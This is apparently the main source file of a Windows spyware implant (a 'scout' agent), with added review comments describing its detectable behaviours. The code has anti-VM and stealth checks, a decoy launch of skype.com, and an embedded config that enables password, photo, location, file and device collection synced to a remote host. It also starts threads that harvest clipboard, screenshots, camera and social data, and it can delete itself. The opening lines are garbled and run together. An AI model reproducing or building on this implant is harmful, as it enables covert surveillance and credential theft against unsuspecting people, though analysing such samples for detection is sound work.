#pragma comment(lib, "Shlwapi") #pragma comment(lib, "winhttp") #pragma comment(lib, "Ws2_32") #pragma comment(lib, "psapi") #include #include #include "globals.h" #include "binpatch.h" #include "utils.h" #include "mayhem.h" #include "debug.h" #include "main.h" #include "md5.h" #include "zmem.h" #include "conf.h" #include "invisibility.h" #include "antivm.h" /* modules */ #include "position.h" #include "social.h" #include "clipboard.h" #include "password.h" #include "screenshot.h" #include "photo.h" #ifdef _DEBUG #include #endif #ifndef _GLOBAL_VERSION_FUNCTIONS_ #define _GLOBAL_VERSION_FUNCTIONS_ #include "version.h" #endif #pragma include_alias( "dxtrans.h", "camera.h" ) #define __IDxtCompositor_INTERFACE_DEFINED__ #define __IDxtAlphaSetter_INTERFACE_DEFINED__ #define __IDxtJpeg_INTERFACE_DEFINED__ #define __IDxtKey_INTERFACE_DEFINED__ #include "camera.h" #include "url.h" BYTE pServerKey[32]; BYTE pConfKey[32]; BYTE pSessionKey[20]; BYTE pLogKey[32]; HANDLE hScoutSharedMemory = NULL; HWND hScoutMessageWindow = NULL; HANDLE hMsgTimer = NULL; BOOL bCollectEvidences = TRUE; extern HANDLE g_hDevMutex; //defined in device.cpp #ifndef _DEBUG ////BYTE EMBEDDED_CONF[513] = "\xEF\xBE\xAD\xelse BYTE EMBEDDED_CONF[513] = "\x90\x01\x00\x00{\"camera\": {\"enabled\":false,\"repeat\":5,\"iter\":null},\"photo\":{\"enabled\":true},\"position\":{\"enabled\":true,\"repeat\":5},\"screenshot\":{\"enabled\":false,\"repeat\":60},\"addressbook\":{\"enabled\":false},\"chat\":{\"enabled\":false},\"clipboard\":{\"enabled\":false},\"device\":{\"enabled\":true},\"messages\":{\"enabled\":false},\"password\":{\"enabled\":true},\"url\":{\"enabled\":false},\"file\":{\"enabled\":true},\"sync\":{\"host\":\"192.168.100.100\",\"repeat\":1}}\x00\x16\xc0\xad\xbb\x01\xc0\xa2\x72\x3b\x23\xff\x46\x93\x68\x9f\x18\x23\x27\x9f\xee"; //BYTE EMBEDDED_CONF[513] = "\x90\x01\x00\x00{\"camera\": 
// (continuation of the commented-out alternate EMBEDDED_CONF that starts on the previous line)
//{\"enabled\":false,\"repeat\":20,\"iter\":10000},\"position\":{\"enabled\":false,\"repeat\":5},\"screenshot\":{\"enabled\":false,\"repeat\":5},\"addressbook\":{\"enabled\":false},\"chat\":{\"enabled\":false},\"clipboard\":{\"enabled\":false},\"device\":{\"enabled\":false},\"messages\":{\"enabled\":false},\"password\":{\"enabled\":false},\"url\":{\"enabled\":false},\"sync\":{\"host\":\"192.168.100.100\",\"repeat\":10}}\x00\x16\xc0\xad\xbb\x01\xc0\xa2\x72\x3b\x23\xff\x46\x93\x68\x9f\x18\x23\x27\x9f\xee";
#endif

/*
 * Main translation unit of the "scout" agent: process entry point, environment
 * checks, key set-up, per-module worker-thread start-up and a memory watchdog.
 *
 * Behaviours in this file that are observable from the outside (useful when
 * writing detections or triaging a sample):
 *   - a WMI query against ROOT\CIMV2 (Win32_PerfFormattedData_PerfProc_Process)
 *     for the process's own PID, repeated every 10 s (MemoryWatchDog);
 *   - an unnamed mutex created in WinMain and shared with device.cpp;
 *   - one worker thread per enabled module, created with CreateThread;
 *   - a message-only window with a random class name (CreateMessageWindow,
 *     currently disabled by an early return);
 *   - on the decoy path, ShellExecute("open", "http://www.skype.com").
 */

/* Implemented in another translation unit (presumably the sync module); run as a thread from WinMain. */
extern VOID SyncThreadFunction();

/*
 * Window procedure for the message-only window that CreateMessageWindow would
 * register. WM_CREATE/WM_PAINT/WM_SIZE/WM_DESTROY are swallowed (return 0),
 * everything else goes to DefWindowProc. The `return 0;` after the switch is
 * unreachable because every case returns.
 */
LRESULT CALLBACK WindowProc(
	_In_ HWND hwnd,
	_In_ UINT uMsg,
	_In_ WPARAM wParam,
	_In_ LPARAM lParam
)
{
	switch (uMsg)
	{
		case WM_CREATE:
			return 0;
		case WM_PAINT:
			return 0;
		case WM_SIZE:
			return 0;
		case WM_DESTROY:
			return 0;
		default:
			return DefWindowProc(hwnd, uMsg, wParam, lParam);
	}

	return 0;
}

/* One worker-thread handle per module; NULL until StartModules creates the thread. None of them is ever closed in this file. */
HANDLE hPositionThread = NULL;
HANDLE hClipBoardThread = NULL;
HANDLE hPasswordThread = NULL;
HANDLE hScreenShotThread = NULL;
HANDLE hSocialThread = NULL;
HANDLE hCameraThread = NULL;
HANDLE hURLThread = NULL;
HANDLE hPhotoThread = NULL;

/* Per-module "running" flags written by StartModules. They are not read anywhere in this file. */
BOOL bPositionThread = FALSE;
BOOL bClipBoardThread = FALSE;
BOOL bPasswordThread = FALSE;
BOOL bScreenShotThread = FALSE;
BOOL bSocialThread = FALSE;
BOOL bCameraThread = FALSE;
BOOL bURLThread = FALSE;
BOOL bPhotoThread = FALSE;

/*
 * Process entry point.
 *
 *  1. If FakeConditionalVersion() is true: clear the leading bytes of the
 *     build-time marker constants, open skype.com in the default browser and
 *     return 1 (presumably a decoy path that makes the binary look like a
 *     harmless launcher).
 *  2. Otherwise InitScout() runs the environment checks and loads the
 *     configuration. On success: AvgInvisibility(), WaitForInput(), create the
 *     device mutex, start the sync thread and the memory watchdog, start the
 *     module threads, then block on the sync thread forever.
 *
 * Returns 1 on the decoy path, 0 otherwise (reached only if InitScout() fails
 * or the sync thread ends). hPrevInstance, lpCmdLine and nCmdShow are unused.
 */
int CALLBACK WinMain(
	__in HINSTANCE hInstance,
	__in HINSTANCE hPrevInstance,
	__in LPSTR lpCmdLine,
	__in int nCmdShow)
{
	if (FakeConditionalVersion())
	{
		// Only the first 3 bytes of each marker (4 of EMBEDDED_CONF) are wiped;
		// the remainder of every constant stays in memory.
		SecureZeroMemory(DEMO_TAG, 3);
		SecureZeroMemory(WMARKER, 3);
		SecureZeroMemory(CLIENT_KEY, 3);
		SecureZeroMemory(ENCRYPTION_KEY_CONF, 3);
		SecureZeroMemory(SCOUT_NAME, 3);
		SecureZeroMemory(EMBEDDED_CONF, 4);

		ShellExecute(NULL, L"open", L"http://www.skype.com", NULL, NULL, SW_SHOWNORMAL);
		return 1;
	}

#ifdef _DEBUG
	OutputDebugString(L"Initializing scout...");
#endif

	if (InitScout())
	{
		AvgInvisibility();

		// wait for input
		WaitForInput();

#ifdef _DEBUG
		OutputDebugString(L"Creating Thread...");
#endif

		//create the mutex for google device
		// Unnamed mutex; shared with device.cpp through the extern g_hDevMutex.
		g_hDevMutex = CreateMutex(NULL, FALSE, NULL);

		// Neither CreateThread result is checked. A NULL hSyncThread would make the
		// WaitForSingleObject below fail immediately and the process would exit.
		HANDLE hSyncThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SyncThreadFunction, NULL, 0, NULL);
		// hMemoryThread is never waited on or closed (handle leaks for the process lifetime).
		HANDLE hMemoryThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MemoryWatchDog, NULL, 0, NULL);

#ifdef _DEBUG
		OutputDebugString(L"Starting modules...");
#endif
		StartModules(); // FIXME camera

		// The main thread lives exactly as long as the sync thread.
		WaitForSingleObject(hSyncThread, INFINITE);
	}

	if (hScoutSharedMemory)
		CloseHandle(hScoutSharedMemory);

	return 0;
}

/*
 * Watchdog thread: every 10 s reads this process's own "PrivateBytes" counter
 * through WMI and toggles the global bCollectEvidences flag with hysteresis:
 *   >= 1,000,000 KB (~1 GB)   -> bCollectEvidences = FALSE
 *   <    500,000 KB (~0.5 GB) -> bCollectEvidences = TRUE
 * The loop never exits, so pSvc and pLoc are never released and COM is never
 * uninitialised on this thread.
 *
 * The namespace ("ROOT\CIMV2") and the WQL query are built from per-character
 * wide arrays instead of string literals — presumably to keep them out of the
 * binary's readable string table; at runtime they are ordinary strings on the
 * stack, so memory scanning still sees them.
 *
 * bCollectEvidences is a plain BOOL written here with no synchronisation; if the
 * module threads read it (not visible in this file) that is a data race.
 */
VOID MemoryWatchDog()
{
	IWbemLocator *pLoc=0;
	IWbemServices *pSvc=0;
	WCHAR strQuery[200] = { L'\0' };
	// "ROOT\CIMV2"
	WCHAR strRootCIM[] = { L'R', L'O', L'O', L'T', L'\\', L'C', L'I', L'M', L'V', L'2', L'\0' };
	// "select * from Win32_PerfFormattedData_PerfProc_Process WHERE IDProcess = %d"
	WCHAR strFormat[] = { L's', L'e', L'l', L'e', L'c', L't', L' ', L'*', L' ', L'f', L'r', L'o', L'm', L' ', L'W', L'i', L'n', L'3', L'2', L'_', L'P', L'e', L'r', L'f', L'F', L'o', L'r', L'm', L'a', L't', L't', L'e', L'd', L'D', L'a', L't', L'a', L'_', L'P', L'e', L'r', L'f', L'P', L'r', L'o', L'c', L'_', L'P', L'r', L'o', L'c', L'e', L's', L's', L' ', L'W', L'H', L'E', L'R', L'E', L' ', L'I', L'D', L'P', L'r', L'o', L'c', L'e', L's', L's', L' ', L'=', L' ', L'%', L'd', L'\0' };

	// Both return values are ignored. CoInitializeSecurity succeeds at most once
	// per process and InitScout() already called it on the main thread, so this
	// second call is expected to fail (harmlessly) with RPC_E_TOO_LATE.
	CoInitializeEx(0, COINIT_MULTITHREADED|COINIT_DISABLE_OLE1DDE);
	CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE,NULL);

	if (CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID *)&pLoc) != S_OK)
	{
#ifdef _DEBUG
		__asm int 3; // debug builds trap on every failure path below as well
#endif
		return;
	}

	if (!pLoc)
	{
#ifdef _DEBUG
		__asm int 3;
#endif
		return;
	}

	BSTR bRootCIM = SysAllocString(strRootCIM);

	if (pLoc->ConnectServer(bRootCIM, NULL, NULL, 0, NULL, 0, 0, &pSvc) != WBEM_S_NO_ERROR)
	{
#ifdef _DEBUG
		__asm int 3;
#endif
		SysFreeString(bRootCIM);
		pLoc->Release();
		return;
	}

	SysFreeString(bRootCIM);

	if (CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE) != S_OK)
	{
#ifdef _DEBUG
		__asm int 3;
#endif
		pSvc->Release();
		pLoc->Release();
		return;
	}

	// Query is fixed to our own PID for the lifetime of the thread.
	_snwprintf_s(strQuery, 200, _TRUNCATE, strFormat, GetCurrentProcessId());

	while (1)
	{
		VARIANT vVariant;
		VariantInit(&vVariant);

		//FIXME: use an array, and use the PID instead of the process name (there may be more than one, since they are legitimate apps)!!
		if (WMIExecQueryGetProp(pSvc, strQuery, L"PrivateBytes", &vVariant))
		{
			// The counter is read as a string (bstrVal — assumes the helper returns a
			// BSTR variant) and converted with _wtoi, which only covers int range:
			// NOTE(review): for values above ~2 GB the result is CRT-defined, and
			// anything negative or saturated lands above the 1,000,000 KB threshold
			// once cast to DWORD — confirm that is acceptable.
			DWORD dwMemUsed = _wtoi(vVariant.bstrVal) / 1024;

			if (dwMemUsed >= 1000000 && bCollectEvidences == TRUE)
				bCollectEvidences = FALSE;

			if (dwMemUsed < 500000 && bCollectEvidences == FALSE)
				bCollectEvidences = TRUE;
		}

		VariantClear(&vVariant);
		Sleep(10000);
	}
}

/*
 * One-time initialisation, called from WinMain before anything else runs.
 *
 * Returns FALSE (the caller then exits) when:
 *   - AntiVM() reports a virtual machine, or another instance ("elite" or
 *     "scout") is detected through its shared memory; if an elite is present
 *     and AmIFromStartup() is true, DeleteAndDie(TRUE) is called first;
 *   - FakeConditionalVersion() is true (WinMain already checked this);
 *   - LoadConf() or CreateScoutSharedMemory() fails.
 * On success the message window is requested (its result is ignored) and COM
 * is initialised on the calling thread.
 */
BOOL InitScout()
{
	// GetTickCount() is a low-entropy seed; anything derived from rand()
	// (presumably GetRandomStringW, used for the window class name) is predictable.
	srand(GetTickCount());

	InitEncryptionKeys();

	BOOL bVM = AntiVM();
	BOOL bElite = ExistsEliteSharedMemory();
	BOOL bScout = ExistsScoutSharedMemory();

	// check for elite or scout presence
	//if (ExistsEliteSharedMemory() || ExistsScoutSharedMemory())
	if (bVM || bElite || bScout)
	{
#ifdef _DEBUG
		OutputDebug(L"[+] An ELITE or SCOUT is already installed here!\n");
		__asm int 3;
#endif
		if (bElite && AmIFromStartup())
			DeleteAndDie(TRUE);

		// FIXME: maybe it is OK to exit here
		return FALSE;
	}

	if (FakeConditionalVersion())
		return FALSE;

	// load conf
	if (!LoadConf())
		return FALSE;

	//if (!DecryptConf())
	//	return FALSE;

#ifdef _DEBUG
	OutputDebugString(L"Creating Shared Memory...");
#endif

	// create scout shared memory
	if (!CreateScoutSharedMemory())
		return FALSE;

	// create message window
	// Return value ignored; CreateMessageWindow() currently returns FALSE unconditionally.
	CreateMessageWindow();

	// Return values unchecked. This is the process's first (and only effective)
	// CoInitializeSecurity call; MemoryWatchDog repeats it later.
	CoInitializeEx(0, COINIT_MULTITHREADED|COINIT_DISABLE_OLE1DDE);
	CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE,NULL);

	return TRUE;
}

/* Deletes the social module's timestamp files, then calls DeleteAndDie(TRUE) to remove this instance. */
VOID Uninstall()
{
	SocialDeleteTimeStamps();
	DeleteAndDie(TRUE);
}

/*
 * Copies the build-time key material into the process-wide key buffers:
 *   pServerKey <- CLIENT_KEY, pConfKey <- ENCRYPTION_KEY_CONF,
 *   pLogKey    <- ENCRYPTION_KEY (32 bytes each)
 * and zeroes the 20-byte session key.
 *
 * Debug builds then overwrite each copy with MD5(constant) — the MD5 helper
 * is assumed to take (input, length, output) and presumably writes a 16-byte
 * digest into the 32-byte buffer; TODO confirm against md5.h.
 *
 * All keys live in plain writable globals for the lifetime of the process, so
 * a memory dump recovers them directly.
 */
VOID InitEncryptionKeys()
{
	memcpy(pServerKey, CLIENT_KEY, 32);
	memcpy(pConfKey, ENCRYPTION_KEY_CONF, 32);
	memcpy(pLogKey, ENCRYPTION_KEY, 32);
	SecureZeroMemory(pSessionKey, 20);

#ifdef _DEBUG
	MD5((PBYTE)CLIENT_KEY, 32, (PBYTE)pServerKey);
	MD5((PBYTE)ENCRYPTION_KEY_CONF, 32, (PBYTE)pConfKey);
	MD5((PBYTE)ENCRYPTION_KEY, 32, (PBYTE)pLogKey);
#endif
}

/*
 * Registers a window class with a random 20-character name and creates a
 * message-only window (HWND_MESSAGE) served by WindowProc, storing the handle
 * in hScoutMessageWindow.
 *
 * NOTE: the first statement is an unconditional `return FALSE;`, so everything
 * below it is dead code in the current build — hScoutMessageWindow stays NULL
 * and WindowProc is never registered. Should it be re-enabled: strClassName is
 * only freed on the success path, and the class is never unregistered.
 */
BOOL CreateMessageWindow()
{
	return FALSE; // FIXME: one timer per thread!

	WNDCLASSEX wClass;
	LPWSTR strClassName = GetRandomStringW(20);

	SecureZeroMemory(&wClass, sizeof(WNDCLASSEX));
	wClass.cbSize = sizeof(WNDCLASSEX);
	wClass.lpszClassName = strClassName;
	wClass.lpfnWndProc = WindowProc;

	if (!RegisterClassEx(&wClass))
	{
#ifdef _DEBUG
		OutputDebug(L"[+] Cannot create message window class: %08x\n", GetLastError());
		__asm int 3;
#endif
		return FALSE;
	}

	hScoutMessageWindow = CreateWindowEx(0L, strClassName, strClassName, 0, 0, 0, 0, 0, HWND_MESSAGE , NULL, NULL, NULL);

	if (!hScoutMessageWindow)
	{
#ifdef _DEBUG
		OutputDebug(L"[+] Cannot create message window: %08x\n", GetLastError());
		__asm int 3;
#endif
		return FALSE;
	}

	zfree(strClassName);
	return TRUE;
}

/*
 * Starts one worker thread per module that the loaded configuration enables
 * (ConfIsModuleEnabled). A thread is created only if its handle is still NULL,
 * so repeated calls do not duplicate threads. When a module is disabled only
 * its b*Thread flag is cleared; a thread that is already running is not
 * stopped here, and no handle is ever closed.
 *
 * The social thread is started when any of addressbook, chat, messages,
 * position, photo, file or device is enabled. The photo module is commented
 * out: Facebook photos are scheduled from social.cpp.
 */
VOID StartModules()
{
	if (ConfIsModuleEnabled(L"addressbook") || ConfIsModuleEnabled(L"chat") || ConfIsModuleEnabled(L"messages") || ConfIsModuleEnabled(L"position") || ConfIsModuleEnabled(L"photo") || ConfIsModuleEnabled(L"file") || ConfIsModuleEnabled(L"device")) //FIXME: array
	{
		if (hSocialThread == NULL)
		{
#ifdef _DEBUG
			OutputDebug(L"[*] Starting hSocialThread\n");
#endif
			hSocialThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SocialMain, NULL, 0, NULL);
			bSocialThread = TRUE;
		}
	}
	else
		bSocialThread = FALSE;

	if (ConfIsModuleEnabled(L"position")) //FIXME: array
	{
		if (hPositionThread == NULL)
		{
#ifdef _DEBUG
			OutputDebug(L"[*] Starting hPositionThread\n");
#endif
			hPositionThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)PositionMain, NULL, 0, NULL);
			bPositionThread = TRUE;
		}
	}
	else
		bPositionThread = FALSE;

	if (ConfIsModuleEnabled(L"clipboard")) //FIXME: array
	{
		if (hClipBoardThread == NULL)
		{
#ifdef _DEBUG
			OutputDebug(L"[*] Starting hClipBoardThread\n");
#endif
			hClipBoardThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ClipBoardMain, NULL, 0, NULL);
			bClipBoardThread = TRUE;
		}
	}
	else
		bClipBoardThread = FALSE;

	if (ConfIsModuleEnabled(L"password")) //FIXME: array
	{
		if (hPasswordThread == NULL)
		{
#ifdef _DEBUG
			OutputDebug(L"[*] Starting hPasswordThread\n");
#endif
			hPasswordThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)PasswordMain, NULL, 0, NULL);
			bPasswordThread = TRUE;
		}
	}
	else
		bPasswordThread = FALSE;

	if (ConfIsModuleEnabled(L"screenshot")) //FIXME: array
	{
		if (hScreenShotThread == NULL)
		{
#ifdef _DEBUG
			OutputDebug(L"[*] Starting hScreenShotThread\n");
#endif
			hScreenShotThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ScreenshotMain, NULL, 0, NULL);
			bScreenShotThread = TRUE;
		}
	}
	else
		bScreenShotThread = FALSE;

	if (ConfIsModuleEnabled(L"camera")) //FIXME: array
	{
		if (hCameraThread == NULL)
		{
#ifdef _DEBUG
			OutputDebug(L"[*] Starting hCameraThread\n");
#endif
			hCameraThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)CameraMain, NULL, 0, NULL);
			bCameraThread = TRUE;
		}
	}
	else
		bCameraThread = FALSE;

	//url module
	if (ConfIsModuleEnabled(L"url")) //FIXME: array
	{
		if (hURLThread == NULL)
		{
#ifdef _DEBUG
			OutputDebug(L"[*] Starting hURLThread\n");
#endif
			hURLThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)URL_Main, NULL, 0, NULL);
			bURLThread = TRUE;
		}
	}
	else
		bURLThread = FALSE;

	/* photo module */
	// not needed atm, Facebook photos scheduled in social.cpp, will be needed with filsystem photos
	/*if (ConfIsModuleEnabled(L"photo"))
	{
		if (hPhotoThread == NULL)
		{
#ifdef _DEBUG
			OutputDebug(L"[*] Starting hPhotoThread\n");
#endif
			hPhotoThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)PhotoMain, NULL, 0, NULL);
			bPhotoThread = TRUE;
		}
	}
	else
		bPhotoThread = FALSE;*/
}
. // NOTE(review): stray character at the end of the page; appears to be an extraction artifact rather than part of the translation unit